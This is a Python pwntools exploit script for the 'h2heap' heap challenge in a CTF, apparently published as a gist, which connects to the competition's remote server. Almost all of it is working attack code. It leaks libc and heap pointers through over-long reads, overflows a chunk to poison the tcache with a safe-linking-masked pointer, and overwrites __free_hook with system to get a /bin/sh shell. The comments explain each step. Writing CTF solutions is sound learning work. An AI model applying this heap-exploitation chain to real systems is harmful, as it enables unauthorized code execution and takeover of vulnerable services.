@hkraw
Last active November 12, 2020 18:50
#!/usr/bin/python3
from pwn import *
from time import sleep
import random
def malloc(idx, size):
    """Drive menu option 1 for slot *idx* with request size *size*.

    Talks to the module-level pwntools tube ``io`` (created in ``__main__``).
    The helper's name suggests option 1 is the binary's allocate command;
    the prompt strings must match the service's menu byte-for-byte.
    """
    option = '1'
    io.sendlineafter('> ', option)
    io.sendlineafter('index: ', str(idx))
    io.sendlineafter('size: ', str(size))
def edit(idx, size, data):
    """Drive menu option 4 for slot *idx*: announce *size*, then send *data* raw.

    Uses the module-level tube ``io``.  *data* is sent with ``send`` (no
    trailing newline), so the caller is responsible for its exact length
    relative to *size*.
    """
    option = '4'
    io.sendlineafter('> ', option)
    io.sendlineafter('index: ', str(idx))
    io.sendlineafter('size: ', str(size))
    io.send(data)
def free(idx):
    """Drive menu option 2 for slot *idx* (release, judging by the helper's name).

    Uses the module-level tube ``io``.
    """
    option = '2'
    io.sendlineafter('> ', option)
    io.sendlineafter('index: ', str(idx))
def view(idx, size):
    """Drive menu option 3 for slot *idx* and return exactly *size* bytes read back.

    Uses the module-level tube ``io``.  ``recvn`` blocks until *size*
    bytes have arrived, so a *size* larger than what the service sends
    hangs the script rather than returning short.
    """
    option = '3'
    io.sendlineafter('> ', option)
    io.sendlineafter('index: ', str(idx))
    io.sendlineafter('size: ', str(size))
    payload = io.recvn(size)
    return payload
def mask(heapbase, target):
    """Return *target* XOR-ed with *heapbase* shifted right by 12 bits.

    The shift-by-page-then-XOR shape matches the free-list pointer mangling
    glibc introduced in 2.32 (safe-linking), which is consistent with the
    author's "libc 2.32 ?" note -- confirm against the actual target libc.
    Pure function; no I/O.
    """
    page_key = heapbase >> 12
    return target ^ page_key
# Offsets into the target's libc.  The author's original note was
# "libc 2.32 ?", i.e. the exact build was not confirmed.  Each value is
# combined with libc_base in __main__ (free_hook and system are added to
# it, unsorted_bin_addr is subtracted from the leaked pointer to derive
# it), so all three must come from the same libc build as the remote
# service or every computed address is wrong.
free_hook = 0x1c5ca0
system = 0x4a830
unsorted_bin_addr = 0x1c2a60
if __name__ == '__main__':
    # The local variant (process with a preloaded libc) is commented out and
    # refers to a `libc` object that is not defined anywhere in this file;
    # restoring it would require defining that first.  As written the
    # script only talks to the remote challenge service.
    # io = process('./h2heap',env={'LD_PRELOAD':libc.path})
    io = remote('chal.cybersecurityrumble.de',29546)
    # Seven allocations.  Slot 1 is the single large request (0x418); the
    # others are small.  Trailing comments keep the slot number visible.
    malloc(0,0x18) #0
    malloc(1,0x418) #1
    malloc(2,0x18) #2
    malloc(3,0x18) #3
    malloc(4,0x28) #4
    malloc(5,0x28) #5
    malloc(6,0x28) #6
    free(1)
    # Read 0x50 bytes back through slot 0 (more than its 0x18 request) and
    # interpret the qword at offset 0x20 as a libc pointer; subtracting
    # unsorted_bin_addr yields the assumed libc base.  Nothing here checks
    # that the value looks like a libc address before it is used.
    libc_leak = u64(view(0,0x50)[0x20:0x28])
    libc_base = libc_leak - unsorted_bin_addr
    print(hex(libc_base))
    free(3)
    # Same read pattern via slot 2: the qword at offset 0x28, minus 0x10,
    # is treated as a heap address and later fed to mask().
    heap_leak = u64(view(2,0x50)[0x28:0x30]) - 0x10
    print(hex(heap_leak))
    free(6)
    free(5)
    # Write 0x38 bytes through slot 4, whose request was 0x28: 0x28 filler
    # bytes, a 0x31 size word, then a mask()-encoded pointer to
    # free_hook-0x10.  The write length exceeding the slot's own size is
    # the memory-safety defect the script depends on.
    edit(4,0x38,b'A'*0x28+p64(0x31)+p64(mask(heap_leak,libc_base+free_hook-0x10)))
    malloc(7,0x28) #7
    malloc(8,0x28) #8
    # Slot 8's contents: "/bin/sh\0", 8 filler bytes, then libc's system
    # address at offset 0x10.
    edit(8,0x18,b'/bin/sh\0'+b'A'*0x8+p64(libc_base+system))
    # pause()
    free(7)
    # Hand the connection to the user.
    io.interactive()